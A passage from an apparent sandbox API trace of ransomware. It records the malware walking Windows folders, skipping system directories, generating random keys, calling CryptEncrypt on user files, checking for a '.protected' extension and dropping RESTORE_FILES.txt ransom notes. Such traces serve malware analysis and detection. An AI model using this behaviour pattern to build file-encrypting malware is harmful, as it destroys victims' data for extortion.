cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned 86 [0093.254] StrStrIW (lpFirst="usertile35.bmp", lpSrch=".protected") returned 0x0 [0093.254] lstrcmpW (lpString1="usertile35.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.254] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.254] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.254] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.254] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned 86 [0093.254] StrStrIW (lpFirst="usertile36.bmp", lpSrch=".protected") returned 0x0 [0093.254] lstrcmpW (lpString1="usertile36.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.254] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.254] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" 
(normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.254] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.254] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned 86 [0093.254] StrStrIW (lpFirst="usertile37.bmp", lpSrch=".protected") returned 0x0 [0093.254] lstrcmpW (lpString1="usertile37.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.254] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.254] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.254] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.254] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned 86 [0093.254] StrStrIW (lpFirst="usertile38.bmp", lpSrch=".protected") returned 0x0 [0093.254] lstrcmpW (lpString1="usertile38.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.254] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.254] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.255] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned 86 [0093.255] StrStrIW (lpFirst="usertile39.bmp", lpSrch=".protected") returned 0x0 [0093.255] lstrcmpW (lpString1="usertile39.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.255] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | 
out: lpFindFileData=0x295ecb0) returned 1 [0093.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned 86 [0093.255] StrStrIW (lpFirst="usertile40.bmp", lpSrch=".protected") returned 0x0 [0093.255] lstrcmpW (lpString1="usertile40.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.255] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned 86 [0093.255] StrStrIW (lpFirst="usertile41.bmp", lpSrch=".protected") returned 0x0 [0093.255] lstrcmpW (lpString1="usertile41.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.255] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.255] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned 86 [0093.255] StrStrIW (lpFirst="usertile42.bmp", lpSrch=".protected") returned 0x0 [0093.256] lstrcmpW (lpString1="usertile42.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.256] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.256] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned 86 [0093.256] StrStrIW (lpFirst="usertile43.bmp", lpSrch=".protected") returned 0x0 
[0093.256] lstrcmpW (lpString1="usertile43.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.256] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.256] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned 86 [0093.256] StrStrIW (lpFirst="usertile44.bmp", lpSrch=".protected") returned 0x0 [0093.256] lstrcmpW (lpString1="usertile44.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0093.256] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.256] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.257] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\RESTORE_FILES.txt") returned 89 [0093.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.257] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="Windows") returned -1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="Program Files") returned -1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="Program Files (x86)") returned -1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="$Recycle.bin") returned 1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="System Volume Information") returned -1 [0093.257] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.protected") returned 74 [0093.257] StrStrIW (lpFirst="guest.bmp.protected", lpSrch=".protected") returned=".protected" [0093.257] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", 
lpString2="Program Files") returned 1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.257] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt") returned 72 [0093.257] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.257] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.257] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="Windows") returned -1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="Program Files") returned 1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="Program Files (x86)") returned 1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="$Recycle.bin") returned 1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="System Volume Information") returned 1 [0093.257] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.protected") returned 73 [0093.257] StrStrIW (lpFirst="user.bmp.protected", lpSrch=".protected") returned=".protected" [0093.257] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.257] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.258] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt") returned 72 [0093.258] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.259] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="Windows") returned -1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="Program Files") returned 1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="Program Files (x86)") returned 1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="$Recycle.bin") returned 1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="System Volume Information") returned 1 [0093.259] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault") returned 38 [0093.259] lstrcmpW (lpString1="Vault", lpString2=".") returned 1 [0093.259] lstrcmpW (lpString1="Vault", lpString2="..") returned 1 [0093.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*") returned 40 [0093.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.259] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.259] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.259] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.259] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.259] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Vault\\.") returned 40 [0093.259] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.259] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.259] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.259] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.259] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.259] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.259] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\..") returned 41 [0093.259] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.260] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.260] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\RESTORE_FILES.txt") returned 56 [0093.260] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.260] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.260] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\RESTORE_FILES.txt") returned 56 [0093.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\vault\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="Windows") returned -1 [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="Program Files") returned 1 [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="Program Files (x86)") returned 1 [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="$Recycle.bin") returned 1 [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="System Volume Information") returned 1 [0093.260] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO") returned 38 [0093.260] lstrcmpW (lpString1="VISIO", lpString2=".") returned 1 [0093.260] lstrcmpW (lpString1="VISIO", lpString2="..") returned 1 [0093.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\*") returned 40 [0093.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.260] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.261] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.261] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.261] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.261] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\.") returned 40 
[0093.261] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.261] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.261] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.261] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.261] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.261] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.261] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\..") returned 41 [0093.261] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.261] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.261] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\RESTORE_FILES.txt") returned 56 [0093.261] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.261] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.261] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.261] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 
[0093.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\RESTORE_FILES.txt") returned 56 [0093.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\visio\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.261] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.261] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0093.261] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="Windows") returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="Program Files") returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="Program Files (x86)") returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="$Recycle.bin") returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="System Volume Information") returned 1 [0093.261] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender") returned 49 [0093.262] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0093.262] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0093.262] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*") returned 51 [0093.262] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.262] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0093.262] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.262] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.262] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.262] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.262] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\.") returned 51 [0093.262] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.262] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.262] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.262] lstrcmpiW (lpString1="..", lpString2="Program Files") 